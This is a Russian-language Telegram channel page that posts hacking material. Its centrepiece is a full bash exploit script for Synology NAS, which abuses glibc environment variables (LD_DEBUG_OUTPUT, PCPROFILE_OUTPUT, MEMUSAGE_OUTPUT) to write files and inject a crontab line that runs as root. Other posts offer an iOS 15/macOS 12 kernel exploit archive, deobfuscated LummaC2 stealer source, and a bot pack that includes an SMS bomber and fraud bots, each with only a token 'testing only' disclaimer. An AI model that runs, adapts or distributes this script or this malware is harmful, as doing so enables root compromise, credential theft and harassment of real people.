квак
21 subscribers
4 photos
4 files
2 links
developer @musifyrobot
Download Telegram
Эксплуатация Synology NAS с использованием разделителей и новых приёмов:
перечисление переменных окружения Linux и методы записи — v1.0
#!/usr/bin/env bash

test_cmd="id"

cron_paths=(
  "/etc/crontab"
  "/usr/lib/crontab"
  "/usr/lib/cron/tabs/root"
  "/var/cron/tabs/root"
  "/var/spool/cron/root"
  "/var/spool/cron/crontabs/root"
  "/var/cron/tabs/root"
  "/var/spool/cron/tabs/root"
  "/etc/cron.d/"
  "/etc/cron.daily/"
  "/etc/cron.hourly/"
  "/etc/cron.weekly/"
  "/etc/cron.monthly/"
  "/etc/cron.15min/"
  "/etc/cron.30min/"
  "/usr/local/etc/cron.d/"
  "/etc/fcrontab"
  "/var/spool/fcron/root"
  "/etc/fcron.allow"
  "/etc/fcron.deny"
  "/etc/anacrontab"
  "/etc/bcron/tabs/root"
  "/etc/bcron/run"
  "/etc/crontabs/root"
  "/usr/lib/cron/tabs/root"
  "/var/cron/tabs/root"
  "/etc/daily"
  "/etc/weekly"
  "/etc/monthly"
)

search_for_cron_paths() {
  local found=0
  for path in "${cron_paths[@]}"; do
    if [[ -e "$path" ]]; then
      echo "[+] Location found: $path"
      found=1
    fi
  done

  if [[ $found -eq 0 ]]; then
    echo "No well-known cron target locations found! Linker dirty file write may not be viable"
  fi
}

test_write_technique() {
  local write_var="$1"
  local write_path="/var/tmp/WRITE-$RANDOM$RANDOM"
  local additional_environ="${2:-}"

  env -i "$write_var=$write_path" "$additional_environ" "$test_cmd" >/dev/null 2>&1

  ls_out=$(ls $write_path* 2>/dev/null)

  if [[ ! -z $ls_out ]]; then
    echo "[+] Success! Wrote to file $ls_out using payload $write_var=$write_path" "$additional_environ"
    rm $write_path*
  else
    echo "[-] Technique $write_var failed"
  fi
}

echo '[*] Attempting to locate potential crontab locations for dirty file write'
search_for_cron_paths

echo '[*] Attempting to write to semi-controlled file path with semi-controlled contents...'
test_write_technique "LD_DEBUG_OUTPUT" $'LD_DEBUG=libs LD_PRELOAD=$(printf \'ESCAPE\\n*\\t*\\t*\\t*\\t*\\troot\\twhoami\\nESCAPE\')'

echo '[*] Attempting to write to fully controlled file path with uncontrolled contents...'
echo '[*] (This useful for targeting automated directory crawlers that are vulnerable to file name-based injections, like CVE-2024-3400)'
test_write_technique "PCPROFILE_OUTPUT" "LD_PRELOAD=libpcprofile.so"
test_write_technique "MEMUSAGE_OUTPUT" "LD_PRELOAD=libmemusage.so"

только для тестирования на своём оборудовании ⚠️

#эксплойт
👍3😐1🆒1
exploit for iOS 15_macOS 12.zip
5.5 MB
Эксплуатация уязвимостей чтения/записи в ядре для iOS 15 и macOS 12

Затронутые уязвимости:

- CVE-2022-32845 — обход проверки цифровой подписи для файла model.hwx.
- CVE-2022-32948 — чтение за пределами буфера (OOB Read) в функции DeCxt::FileIndexToWeight() из-за отсутствия проверки индекса массива.
- CVE-2022-42805 — потенциальное произвольное чтение памяти в функции ZinComputeProgramUpdateMutables() вследствие целочисленного переполнения.
- CVE-2022-32899 — переполнение буфера вниз (buffer underflow) в функции DeCxt::RasterizeScaleBiasData() из-за целочисленного переполнения.


Уязвимые устройства:

- iPhone 12 Pro (iPhone13,3) под управлением iOS 15.5
- iPad Pro (iPad8,10) под управлением iPadOS 15.5
- iPhone 11 Pro (iPhone12,3) под управлением iOS 15.4.1
- MacBook Air (MacBookAir10,1) на чипе Apple M1 с macOS 12.4


только для тестирования на своём оборудовании ⚠️

#эксплойт
👍3😁1
Пак ботов.zip
15.8 MB
15 приватных телеграмм ботов

Пак актуальных телеграм ботов. Можно использовать под различные цели. Инструкция по установке внутри.

📁 В паке имеется:
- Фейк Глаз Боба
- Гарант бот от Scrooge
- 21 очко (казино)
- Казино за 1500
- Кубик (слив привата)
- Приватный cмc б0мбeр
- 0трисoвщик
- Гарант бот
- Бот автопродаж две версии
- Бот для заявок воркeров
👍4💅1
разоблачение скама на $27 миллионов

1. браузеры физически не умеют сами запускать любые скачанные файлы (тем более исполняемые). чтобы код выполнился без единого клика, нужен редчайший rce-0day в chrome или safari, но такие эксплойты нулевого дня с автоматическим выполнением кода на актуальных версиях практически не существуют в открытом доступе (либо находятся в руках очень узкого круга лиц, либо доступны только государственным структурам).


2. на ios всё ещё сложнее: там физически невозможно запустить какое-либо приложение вне app store, система не выдаёт доступ к данным других приложений, всё критически важное лежит в secure enclave. вирусы через одну лишь ссылку в safari уже невозможны по архитектуре системы. чтобы реально взломать iphone через браузер, нужна цепочка уязвимостей уровня pegasus (которая опять же доступна только государствам).


единственный реалистичный вариант, человек САМ скачал и САМ запустил файл на компьютере. дальше стиллер спокойно вытащил сид-фразу или другие данные. никакого автоматического заражения iphone, никакого магического захвата мультисигов через ссылку не существует. это классическая попытка прикрыть собственную ошибку громкой историей и невозможной. либо человек просто выдумал всё это, не понимая технического аспекта (что более вероятно).


специально для @stars_away
🥰8😁1🤡1
LummaC2-Stealer-main.zip
28.1 KB
деобфусцированный код LummaC2, одного из самых популярных приватных стиллеров.

только для тестирования на своём оборудовании ⚠️
👍3🔥3💩1
Forwarded from Enderman
«Our frontend is not vibe coded!»

The background:
👍3🍌1
🍌2
⚠️ Из-за очередной блокировки Telegram
ловите бесплатные прокси

https://t.me/proxy?server=193.42.125.234&port=8443&secret=c79168e47597ae657a284d5ba3e79c5e

https://t.me/proxy?server=62.60.228.41&port=8443&secret=42747e30a24e419b988d0d98ab24f2dc

https://t.me/proxy?server=83.166.254.85&port=443&secret=dd6b3fb02424dbac55fef2da67c8c949

📌 Как подключиться:
просто нажми на ссылку, тг сам предложит добавить прокси.

рекламы нету :)

@qwaqdevv | @stars_away
👍3